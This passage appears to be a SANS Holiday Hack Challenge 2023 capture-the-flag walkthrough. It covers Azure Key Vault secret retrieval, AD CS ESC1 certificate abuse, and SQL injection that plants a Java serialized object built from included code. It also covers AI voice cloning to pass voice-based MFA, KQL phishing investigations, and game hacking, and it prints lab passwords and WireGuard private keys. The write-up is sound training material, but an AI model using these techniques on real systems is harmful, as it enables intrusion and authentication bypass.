YjA5NDJmMy05YmNhLTQ4NGItYTUwOC1hYmRhZTJkYjVlNjQvcmVzb3VyY2Vncm91cHMvbm9ydGhwb2xlLXJnMS9wcm92aWRlcnMvTWljcm9zb2Z0Lk1hbmFnZWRJZGVudGl0eS91c2VyQXNzaWduZWRJZGVudGl0aWVzL25vcnRocG9sZS1zc2gtc2VydmVyLWlkZW50aXR5In0.kxpTrM8g-xDQPgqX9uezsNLbqmAtMYOc5wEazqrKh_gPA3NHJeum3x5iVxPeLC6E8S29E0tBb3MyZzJ2OJjmi_DXD9USj2nFvXLAGqkc9NA6DKDsprF-2KgndfFBAvyiupG2caw6k4Ps4Eq6Kz7zvnTtfBa3cJxM8WYkNIvDrSm_RbKczt0IgSFGdwU7FkRBE688E6a4x2CqTQLpYE5bFSeAgXXVXKK6Z4OYXxaIRwuP7aJZxCzMgpblMIWL1lMxNOd4ttmikdVQ66SPQWB_7WsghcpV9phmvNx3wJ9WebUORMN_MOJ_sTFfmtlkNXO0IV7OPuKvi204OkLN8PlxoQ"\
-X GET https://northpole-it-kv.vault.azure.net/secrets/tmpAddUserScript/ec4db66008024699b19df44f5272248d?api-version=7.4 | jq
Success!! We found some PowerShell syntax with user secrets in the vault.
Cleaned up output:
# Import Active Directory moduleImport-ModuleActiveDirectory# Set user information$UserName="elfy"$UserDomain="northpole.local"$UserUPN="$UserName@$UserDomain"$Password=ConvertTo-SecureString"J4`ufC49/J4766"-AsPlainText-Force$DCIP="10.0.0.53"# Create a new Active Directory userNew-ADUser-UserPrincipalName$UserUPN`-Name$UserName`-GivenName$UserName`-Surname""`-Enabled$true`-AccountPassword$Password`-Server$DCIP`-PassThru
File Share Exploitation
Now that we have some valid credentials, let’s do some more recon. Using smbclient.py let’s see if we can find any shares
We found the share, but don’t have access with the elfy user. If we cat out the contents of todo.txt, this appears to be by design. We’ll have to see if we can gain access with another account.
Let’s do some user recon to see if we can find other user profiles on the share
With a previous login time, we might be able to leverage wombleycube's stored hash, let’s explore more of the Impacket toolkit.
After researching the tools, maybe we can abuse the Active Directory Certificate Services (AD CS), or even generate one. Using Certipy from the Impacket toolkit, let’s learn more about the configuration.
We have some outputs, let’s take a look at 20240106013853_Certipy.json
cat 20240106013853_Certipy.json | jq
It looks like the NorthPoleUsers template is vulnerable to ESC1, which is when a certificate template permits Client Authentication and allows the enrollee to supply an arbitrary Subject Alternative Name (SAN).
Let’s see if we can request a certificate as elfy but input the SAN as wombleycube@northpole.local
Shifty McShuffles is hustling cards on Film Noir Island. Outwit that meddling elf and win!
We have a hint about Python NaN Injection on our badge, we can use nan as the value for one of our cards that will always be interpreted larger than 9, allowing us to win every time!
Greetings, rookie. Tangle Coalbox of Kusto Detective Agency here. I’ve got a network infection case on Film Noir Island that needs your expertise. Seems like someone clicked a phishing link within a client’s organization, and trouble’s brewing. I’m swamped with cases, so I need an extra pair of hands. You up for the challenge? You’ll be utilizing the Azure Data Explorer and those KQL skills of yours to investigate this incident. Before you start, you’ll need to create a free cluster. Keep your eyes peeled for suspicious activity. IP addresses, and patterns that’ll help us crack this case wide open. Remember, kid, time is of the essence. The sooner we can resolve this issue, the better. If you run into any problems, just give me a holler, I’ve got your back. Good hunting, and let’s bring this cyber criminal to justice. Once you’ve got the intel we need, report back and we’ll plan our next move. Stay sharp, rookie.
Onboarding - Welcome to SANS Holiday Hack 2023!
How many Craftperson Elf’s are working from laptops?
Using the Employees table, we can filter on the role and if the hostname has “LAPTOP”. Then, we can futher refine our results by using the distinct query to elimiate duplicate entries.
Case 1 - Welcome to Operation Giftwrap: Defending the Geese Island network.
Q1: What was the email address of the employee who received this phishing email?
We can structure our query to first look at the malicious url, then correlate the IP address with the employee. From those results, we’ll know who it was and what their email address is:
Q3: What was the subject line used in the spear phishing email?
We have this answer from our previous query.
Q3 Answer: [EXTERNAL] Invoice foir reindeer food past due
Case 2 - Someone got phished! Let’s dig deeper on the victim…
We can find all three of these answers from a single query. We know the victim is Alabaster Snowball so we can query based on name, then filter the results to answer each question.
Q1: The attacker created a reverse tunnel connection with the compromised machine. What IP was the connection forwarded to?
We can query the ProcessEvents table for the questions in Case 4. First, let’s look for activity on Alabaster’s desktop related to a reverse shell shortly after our indicator of compromise timeframe 2023-12-02T10:12:42Z. Let’s look at the next 24 hrs.
Q2: What is the timestamp when the attackers enumerated network shares on the machine?
Our previous query for Q1 includes the result for this answer as well. We are looking for the timestamp of when the net share command was executed. (see Q2 callout in the screenshot above).
Q2 Answer: 2023-12-02T16:51:44Z
Q3: What was the hostname of the system the attacker moved laterally to?
This question seems a little misleading. The authentication logs prove useless in this scenario, if we expand the timeframe of our original search, we’ll see where a command to map a network share was executed. The hostname for that share is the answer. After finding this answer, I refined my query by adding net use to easily highlight the answer.
Q2: What was the name of the file the attacker copied from the fileshare? (This might require some additional decoding)
We can throw this into our PowerShell sandbox to see if we can decode the message dynamically. The message prints out backwards initially, so we can add a line to reverse the message to correctly display the answer.
Q3: The attacker has likely exfiltrated data from the file share. What domain name was the data exfiltrated to?
We’ll have two rounds of obfuscation to work through for this challenge. First, we can do like we did on Q2 and dynamically decode the first part of the command. We only want the string before it is piped into execution.
Now we’ll take the output of our previous command and use PowerShell to dynamically put together the ASCII array to reveal the obfuscated command, and our answer!
What was the command line flag used alongside this executable?
The output from above had the switch used as well.
Q2 Answer: --wipeall
Congratulations!
Congratulations, you’ve cracked the Kusto detective agency section of the Holiday Hack Challenge! To earn credit for your fantastic work, return to the Holiday Hack Challenge and enter the secret phrase which is the result of running this query:
Attention, Digital Defenders! You’ve entered the realm of the Phishing Detection Agency, where advanced AI meets human insight. It’s been reported that AI has started hallucinating, and it’s up to you to discern the reality behind these emails.
Key: In the shadow-laden corridors of our menu, the Phishing link casts a crimson hue, a siren’s call warning that the number of deceitful emails is amiss. Should our digital sleuthing align perfectly with the cunning of these tricksters, watch as it transforms, glowing an emerald green in triumphant success.
Collaboration with ChatNPT: In our ongoing battle against phishing, we’ve enlisted ChatNPT to preliminarily flag potential phishing attempts. These flagged emails are stored in the Phishing Folder. However, AI isn’t foolproof! It’s up to you, the astute investigator, to dive into these emails and confirm their legitimacy. Cross-reference with our DNS records, apply your knowledge of SPF, DKIM, and DMARC, and ensure that only true phishing threats remain in the Phishing Folder. Your keen eye for detail is crucial in outsmarting these digital tricksters!
Your mission: Navigate through our virtual vault of emails, employ your knowledge of SPF, DKIM, and DMARC, and identify those deceptive, phishing attempts.
To solve this challenge, we’ll need to make use of the provided DNS settings:
The best way to approach this challenge is to open the inbox and sort through each message one-by-one to make sure they are all received from mail.geeseislands.com, have a valid DKIM-signature for geeseislands.com, and pass DMARC.
There are 10 messages in total that need to be marked as phishing to complete the challenge.
There’s a door that needs opening on Space Island! Talk to Jewel Loggins there for more information.
1st Conversation with Jewel Loggins
What are you doing here, and who are you? Me first? I’m Jewel Loggins. And I was trekking through the jungle and happened to find this place. I liked this spot and decided to set up camp. Seeing you here is quite the surprise. Well, because the only other person I’ve ever seen come here is Wombley Cube. I thought this tram station in the middle of the jungle was strange to begin with, but then Wombley added to the intrigue. I guess all this spy stuff is typical for him, so maybe I shouldn’t think much of it. I’m sure everything’s fine. Every time he comes here, he says something to the speaker. Then, the door opens, and he rides the tram somewhere. I gave it a try, but the door didn’t open for me. Knowing Wombley, it’s some kind of secret passphrase. If you wanna see where the tram goes, I think you need to find out what that passphrase is. Ribb Bonbowford over at Coggoggle Marina on Steampunk Island works with Wombley. Try asking if he knows. I hope you find it. I’ll be here when you get back!
2nd Conversation with Jewel Loggins
What, you know the passphrase!? Let me try it! Nope, didn’t work. Knowing Wombley, the passphrase isn’t the only requirement. He’s all about that MFA! Oh yeah, multi-factor authentication! The passphrase for something he knows, and his voice for something he is! That’s it! You need to be Wombley. You need his voice. Now, how are you gonna get that? Since only us elves can get a subscription to use ChatNPT, try searching for another AI tool that can simulate voices. I’m sure there’s one out there.
Conversation with Wombley Cube
Wombley Cube here, welcome to Chiaroscuro City! Have you heard about my latest project? I’ve been so inspired by these wonderful islands I’ve decided to write a short story! The title? It’s “The Enchanted Voyage of Santa and his Elves to the Geese Islands.” Sounds exciting, right? Here, have this audiobook copy and enjoy the adventure at your convenience, my friend! Consider it a welcome gift from yours truly, to make your holiday even more delightful. Trust me, this captivating tale of fiction is going to take you on a magical journey you won’t forget. Oh, and I promise it will provide some great entertainment while you explore the rest of Geese Islands!
Solution Walkthrough
With the secret passage from the Active Directory challenge in hand, we need to find a way to read it in Wombley Cube’s voice. We’ll use a trial version of Speechify to generate an audio file.
Upload wombleycube_the_enchanted_voyage.mp3 and paste in the secret passphrase, then click Generate Audio!
Gain access to Jack’s camera. What’s the third item on Jack’s TODO list?
Setup
Server
To get things started, we can click on the main console at the Zenith SGS on Space Island. From there we can click on the Gator in the bottom right hand corner, then click on Time Travel to obtain a configuration file.
###BEGIN###
### This is the server's Wireguard configuration file. Please consider saving it for your record. ###
[Interface]
Address = 10.1.1.1/24
PrivateKey = aVAvnHXQtNhwCoVS5AieB1Usk+2M3SrHtEkUD6ooNCY=
ListenPort = 51820
[Peer]
PublicKey = 3PoewiCddgwdWCLyd09hVWUIbLpsux3NO970ayE5mH4=
AllowedIPs = 10.1.1.2/32
###END####
###BEGIN###
### This is your Wireguard configuration file. Please save it, configure a local Wireguard client, and connect to the Target. ###
[Interface]
Address = 10.1.1.2/24
PrivateKey = cxajxbRUf9lZVYDv0KgyJcfpvndmHQioMZhKQ/18vVg=
ListenPort = 51820
[Peer]
PublicKey = QnVFXINvMeKn7tmdAiJTsDl3FomVsurVmpTurlcBwh0=
Endpoint = 34.135.35.148:51820
AllowedIPs = 10.1.1.1/32
###END####
GateXOR> {end}...[timeline] reverted!
Container
Next, we can interact with the NanoSat-o-Matic vending machine located to the left of the GateXOR console and obtain a free samlple.
This is a docker container, let’s get Docker installed on our kali opstation.
sudo apt-get install -y docker.io
sudo systemctl enable docker --now
sudo usermod -aG docker $USER#allow to run without sudo#logoff and log back in
Now we can open and follow the README.md with the build instructions and connection info. Once the container is deployed, we can use it to connect to the GateXOR nanosat instance.
Let’s use Remmina to connect to the local Docker container we just launched. We can connect to our loopback IP address on port 5900 - 127.0.0.1:5900
Note: The VNC connection is janky, it may take a few tries for the display to appear
Solution Walkthrough
After following the README, let’s verify our connection settings:
We have a successful connection, now we can right-click on the desktop and select: Satellite Tools > Launch NanoSat MO Base Station Tool
Input the provided URL from the README.md and click Fetch Information
Let’s select Connect to Selected Provider, then navigate to the Apps Launcher service and Run the camera app.
Next, we can navigate back to the Communication Settings (Directory) tab and we’ll have a second item in the Providers List: 2. App: Camera. Select it and click on Connect to Selected Provider.
Now, under the Action Service tab, we have an interesting name: Base64SnapImage and description: Uses the NMF Camera service to take a jpg picture.
Let’s click on the Parameter Service tab and click on getValue.
Since we can’t select anything or see the whole message on the value that was returned, we need to capture the data another way. Looking at different tools on the container instance, we have Wireshark available. Let’s run the getValue action again while capturing traffic on the wg0 interface, then follow the TCP stream to see the entire base64 string.
We need to save this capture and move it from the container to analyze on our optstation with more computing resources. From the opstation, run:
docker cp a9ed147e2a45:/root/jpg-capture.pcapng .
We can now view the stream again and copy the raw base64 string into Cyberchef to decode it, then save the output. Based on the JFIF file header, Cyberchef will detect and use the .jpg extension when saving.
Finally, we can open the reconstructed file and get a view of Jack’s list in the background for the answer!
Thwart Jack’s evil plan by re-aiming his missile at the Sun.
We can repeat the setup steps from the Camera Access Challenge to connect to the CTT: Consumer Test Tool again.
This time, we’ll go to the Apps Launcher service tab, select the missile-targeting-system option, and click runApp. We’ll see a new URI that we can use to connect to the missile system dirctory.
Let’s copy this value and plug it into the Directory Service URI field in the Communication Settings tab, then click Fetch Information. Now we can select the new App in the providers list, then Connect to Selected Provider
After some tinkering to get familiar with the options in the missile-targeting-system App; we find that we can interact with the Debug option in the Action service tab and retrive a corresponding response value or error in the Parameter service tab.
For example, we can click on submitAction in the Action service tab, leave the fields blank and click Submit. Then switch to the Parameter service tab and highlight the Debug field and click on getValue. We can see a returned value from the provider containing a database version.
Maybe we can break things! In the Action service tab, let’s try passing a single quote ' using submitAction to see if we can generate an error in the response.
Now let’s switch back to the Parameter service tab and getValue for the Debug field again to retrieve the response.
Sure enough, we influenced a different response by breaking the SQL query. Let’s try some injection techniques!
Reconniassance
Coming in heavy handed, let’s throw a Golden Statement at this DB to see if we can dump all of the table names. We can prepend our syntax with a semicolon ; to have our query treated as a legitimate extension of syntax the database is expecting.
We can see the entire table schema, this is a step in the right direction! Let’s exclude everything from the default information_schema to reveal the configured Database Name, Table Names, and Column Names.
Now we can see that the numerical_mode is currently set to 0. We can assume this is set to Earth Point Mode Let’s try updating it to 1 to change to Sun Point Mode.
This table contains the coordinates to what we can assume is the Geese Islands, which appear to be southeast of the Hawaiian Islands in the Pacific Ocean. The data is interesting, but not particularly useful to us as of now. Let’s keep rolling.
This output is interesting. Based on our permissions, we can modify using the INSERT keyword. It looks like the object column contains some java code, but we can’t see the entire output in the Returned Values window. Let’s use Wireshark to capture the complete response. After some cleaning up we have the following jave code.
importjava.io.Serializable;importjava.io.IOException;importjava.nio.charset.StandardCharsets;importjava.nio.file.*;importjava.util.stream.Collectors;importjava.util.stream.Stream;importjava.sql.*;importjava.util.ArrayList;importjava.util.HashMap;importjava.util.List;importcom.google.gson.Gson;publicclassSatelliteQueryFileFolderUtilityimplementsSerializable{privateStringpathOrStatement;privatebooleanisQuery;privatebooleanisUpdate;publicSatelliteQueryFileFolderUtility(StringpathOrStatement,booleanisQuery,booleanisUpdate){this.pathOrStatement=pathOrStatement;this.isQuery=isQuery;this.isUpdate=isUpdate;}publicStringgetResults(Connectionconnection){if(isQuery&&connection!=null){if(!isUpdate){try(PreparedStatementselectStmt=connection.prepareStatement(pathOrStatement);ResultSetrs=selectStmt.executeQuery()){List<HashMap<String,String>>rows=newArrayList<>();while(rs.next()){HashMap<String,String>row=newHashMap<>();for(inti=1;i<=rs.getMetaData().getColumnCount();i++){Stringkey=rs.getMetaData().getColumnName(i);Stringvalue=rs.getString(i);row.put(key,value);}rows.add(row);}Gsongson=newGson();Stringjson=gson.toJson(rows);returnjson;}catch(SQLExceptionsqle){return"SQL Error: "+sqle.toString();}}else{try(PreparedStatementpstmt=connection.prepareStatement(pathOrStatement)){pstmt.executeUpdate();return"SQL Update completed.";}catch(SQLExceptionsqle){return"SQL Error: "+sqle.toString();}}}else{Pathpath=Paths.get(pathOrStatement);try{if(Files.notExists(path)){return"Path does not exist.";}elseif(Files.isDirectory(path)){// Use try-with-resources to ensure the stream is closed after use
try(Stream<Path>walk=Files.walk(path,1)){// depth set to 1 to list only immediate contents
returnwalk.skip(1)// skip the directory itself
.map(p->Files.isDirectory(p)?"D: "+p.getFileName():"F: "+p.getFileName()).collect(Collectors.joining("\n"));}}else{// Assume it's a readable file
returnnewString(Files.readAllBytes(path),StandardCharsets.UTF_8);}}catch(IOExceptione){return"Error reading path: "+e.toString();}}}publicStringgetpathOrStatement(){returnpathOrStatement;}}
After some research and asking ChatGPT what this code does, we can prepare our environment to generate a serialized java object.
Like before, let’s get this code moved to our Kali opstation. Save the TCP stream data to a .txt file, then copy it out of the docker container.
Let’s create a new working directory called exploit and save the code we just extracted as: SatelliteQueryFileFolderUtility.java.
After some trial and error with ChatGPT, we have the following java code that we can use to output a serialized object containing our update query. Let’s save the code in a file named Main.java.
importjava.io.FileOutputStream;importjava.io.IOException;importjava.io.ObjectOutputStream;importjava.io.Serializable;publicclassMain{publicstaticvoidmain(String[]args){// Creating an instance of SatelliteQueryFileFolderUtility with SQL-like statement
SatelliteQueryFileFolderUtilityutility=newSatelliteQueryFileFolderUtility("UPDATE missile_targeting_system.pointing_mode SET numerical_mode = 1 WHERE id = 1",true,true);// Serializing the object to a file with specified filename
try(ObjectOutputStreamobjectOut=newObjectOutputStream(newFileOutputStream("exploitQuery.ser"))){objectOut.writeObject(utility);}catch(IOExceptione){e.printStackTrace();}}}
With our resources in order, let’s set up the requirements we need to compile the code.
Our working directory should now look something like this:
Compile the code and run to generate our serialized output.
javac -cp .:gson-2.10.1.jar Main.java #compilejava Main #write serialized data to exploitQuery.ser
Now we can use xxd to convert our serialized data to hex format. We’ll use the -p switch to just show the hex data.
xxd -p exploitQuery.ser
Now we can put it all together by taking our hex output of the serialized data and injecting it through a query to redirect Jack’s missile toward the sun.
Upon sending this query, the challenge will be marked as complete! Let’s verify that the mode has changed to 1 by querying the pointing_mode table one last time.
Find the first Gamegosling cartridge and beat the game
Find the cartridge:
The game cartridge can be found in the upper right-hand corner on the Island of Misfit Toys: Tarnished Trove port under a pirate hat.
Beat the Game:
For the first game, we can win by playing it as-is without any hacking or cheating. The action item allows us to throw music notes at the squares. When a square starts playing music, it needs to be moved to another position. The new position will be flashing green while the music is playing. We need to find and move all 7 pieces to the correct positions to win. After winning the screen zooms out so we can scan the QR code that links to http://8bitelf.com for the flag and… GLOOOOORY!
Find the second Gamegosling cartridge and beat the game
Hints:
Gameboy 2: From Tinsel Upatree
Try poking around Pixel Island. There really aren’t many places you can go here, so try stepping everywhere and see what you get!
This feels the same, but different!
If it feels like you are going crazy, you probably are! Or maybe, just maybe, you’ve not yet figured out where the hidden ROM is hiding.
I think I may need to get a DIFFerent perspective.
I wonder if someone can give me a few pointers to swap.
Find the cartridge:
This one can be found at Driftbit Grotto on Pixel Island
Beat the Game:
With all the hints, if we refresh the page a few times while launching the game, there are two different versions game0.gb and game1.gb. The difference is a mirror image of the map where T-wiz won’t allow us to pass!
We can look at the source for the page and use the corresponding URLs to download the game files so we can manipulate them offline. We can use an emulator like BGB.
As soon as the dialogue box closes, our character automatically rmoves away from the opening by a few steps. This action is forced in the opposite direction. With the first difference between the two ROMs being the mirrored orientation, maybe we can manipulate that action to force us through the door in the other version of the game.
Let’s open both files in HxD (a hex editor) to do a comparison.
We can press CTRL+K to compare both files side-by-side, then use F6 to cycle through differences. After working our way through a few differences, we come across a single character difference right after the “You shall not pass” dialogue.
Since one game forces the character up, and the other forces them down. Let’s swap this value in one of the games. We’ll patch game1.gb with 02 to see if we can force our way past the barrier. Make the change and save to a new file, we’ll use game1-patched.gb
We can play our patched version and float right past T-wiz!
Listening to that radio, it sounded like morse code… Let’s take the audio from our file and upload it to an online converter to retrieve the message.
The default settings didn’t have enough sensitivity to convert the tones initially. Bumping the Maximum volume to -40 did the trick.
We can take our message and submit for the answer. GLORY!
Find the third Gamegosling cartridge and beat the game
Hints:
Gameboy 3: From Angel Candysalt
The location of the treasure in Rusty Quay is marked by a shiny spot on the ground. To help with navigating the maze, try zooming out and changing the camera angle.
This one is a bit long, it never hurts to save your progress!
8bit systems have much smaller registers than youβre used to.
Isnβt this great?!? The coins are OVERFLOWing in their abundance.
Find the Cartridge:
Navigate the maze in Rusty Quay on Steampunk Island.
Beat the Game:
We can open this game in BGB and start playing. Eventually we get through three sections and run into Jared who says: “Back in my SysAdmin days marketing always loved talking about 5 nines. But we all know it was more like 3 nines.”
Let’s try to collect 999 coins.
Ah! An in-game bug is preventing us from carrying 999 coins. Let’s open the debugger tools in BGB by pressing ESC. We’ll follow the BGB documenation to search for each memory address holding a coin value and try to freeze them at 999 coins. We’ll have to do the ones, tens, and hundreds places individually since they are stored in separate addresses
Ones: We’ll work with 3 coins in this place and work to narrow possible memory locations down to as few as possible. We are able to get it down to 2 possibilities. Let’s freeze them both to 9.
Right click on the memory address in the cheat searcher window > go to debugger > right click on the hex value > freeze ram address
We can rinse and repeat the process for the tens and hundreds place until all three are 999.
With our 999 coins in hand, we can play through to the last phase where some additional floating rocks will provide a path across the open pit where we’ll meet up with Tom and blow his mind that we can hold that many coins. GLOOOOOOOOOOOORY!!
Catch twenty different species of fish that live around Geese Islands. When you’re done, report your findings to Poinsettia McMittens on the Island of Misfit Toys
We can manually play the game to catch 20 fish. Following the hints to inspect the source code starts to reveal some ideas on how we can think about automating the process.
Catch at least one of each species of fish that live around Geese islands. When you’re done, report your findings to Poinsettia McMittens.
Now that the scale of our fishing operation has grown beyond a fixed number like we had before; we need to re-visit automating the process.
If we open the Sources tab in our browser developer tools, then navigate to 2023.holidayhackchallenge.com/sea/js/client.js?nocache=27060298323552, we’ll find the source code for actions when we are at sea. The logic for the fishing minigame begins on line 201. We can add the following steps, then save and manually cast our line to trigger the automation!
if(me.fishing){reelItInBtn.style.display='block';if(me.onTheLine){reelItInBtn.classList.add('gotone');reelItInBtn.innerText='Reel it in!';reelItInBtn.click();//automate "Reel it in" action on each bite
setTimeout(()=>{//show pescadex for 2 seconds after every catch
closeFeeshBtn.click()//automate closing pescadex
},2000);setTimeout(()=>{//wait 1 second to cast atain
castReelBtn.click()//auto cast again
},1000);}else{reelItInBtn.classList.remove('gotone');reelItInBtn.innerText='Reel it in';}}else{reelItInBtn.style.display='none';}
A sped-up example of auto-catching more fish!
This process got us to 170/171 fish, we still need one more! After hours of trying different spots to no avail, a closer review of the source code provided evidence of a heatmap that I didn’t see earlier.
We can pull all the fish we have already caught by right clicking anywhere in the ocean and click inspect. Then input the following into the console:
playerData.fishCaught
Comparing this list against the list of fish names on the heatmap site, we are still missing the Piscis Cyberneticus Skodo. This fish is only available in a small area.
For complete overkill, we can modify the transparency and overlay the image with the map using an editing tool like PhotoShop. To really go overboard, let’s put this heatmap image into our game session. We can overwrite the map source files with ours. We’ll make it a little bigger, then go find that last fish.
After a short while, we got the last bite we needed to complete the challenge!
Jason Blanchard appears as a fish out of water in this year’s challenge! He can be found soaking up the sun’s gnarly vibes in the bottom left-hand corner at Steampunk Island: Coggoggle Marina.
I was inspecting the web content for the Elf Hunt challenge when I came across the image assets for the site. The pixel_island_foreground has a nice little hidden message: you are Awesome!
